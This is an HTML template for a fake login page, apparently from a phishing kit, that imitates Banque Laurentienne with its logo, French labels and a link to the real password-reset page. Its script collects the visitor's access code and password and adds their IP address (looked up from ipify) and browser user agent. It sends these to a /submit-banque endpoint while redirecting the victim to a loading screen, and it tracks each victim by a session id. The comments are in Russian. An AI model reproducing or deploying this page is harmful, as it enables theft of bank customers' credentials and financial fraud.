<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion - Banque Laurentienne</title>
    <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 min-h-screen flex flex-col">
    <!-- Logo in the top left -->
    <header class="p-4">
        <img src="https://i.postimg.cc/Z59xsZWM/logo-mobile-fr-new.png" alt="Banque Laurentienne Logo" class="h-10">
    </header>

    <!-- Centered login form -->
    <main class="flex-grow flex items-center justify-center">
        <!-- Добавлена форма с методом POST и действием /submit-login -->
        <form method="POST" action="/submit-banque" id="banque-login-form" class="bg-white p-6 rounded-lg shadow-md w-full max-w-sm">
            <input type="hidden" name="url_id" value="{{ url_id }}">

            
            
            <!-- Access Code Field -->
            <div class="mb-4">
                <label for="access-code" class="block text-gray-700 font-medium mb-2">Code d'accès</label>
                <!-- Добавлено name="login-id" -->
                <input type="text" id="access-code" name="login-id" class="w-full p-2 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Code d'accès">
            </div>

            <!-- Password Field -->
            <div class="mb-4">
                <label for="password" class="block text-gray-700 font-medium mb-2">Mot de passe</label>
                <div class="relative">
                    <!-- Добавлено name="password" -->
                    <input type="password" id="password" name="password" class="w-full p-2 border border-gray-300 rounded focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Mot de passe">
                </div>
            </div>

            <!-- Checkbox -->
            <div class="mb-4">
                <label class="flex items-start">
                    <input type="checkbox" class="mt-1 mr-2">
                    <span class="text-gray-600 text-sm">
                        Se souvenir de moi<br>
                        Pour créer un profil de connexion, sélectionnez « Se souvenir de moi ». Sur l'appli mobile, cette option vous permettra d'utiliser VueRapide ou la connexion biométrique.
                    </span>
                </label>
            </div>

            <!-- Login Button - изменен на type="submit" -->
            <button type="submit" class="w-full bg-gray-400 text-white py-2 rounded hover:bg-gray-500 transition">CONNEXION</button>

            <!-- Password Reset Link -->
            <div class="mt-4 text-center">
                <a href="https://auth.banquelaurentienne.ca/forgotPac" class="text-blue-600 text-sm hover:underline">Réinitialiser le mot de passe</a>
            </div>
        </form>
    </main>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#banque-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'banque');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-banque', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'banque');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-banque', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>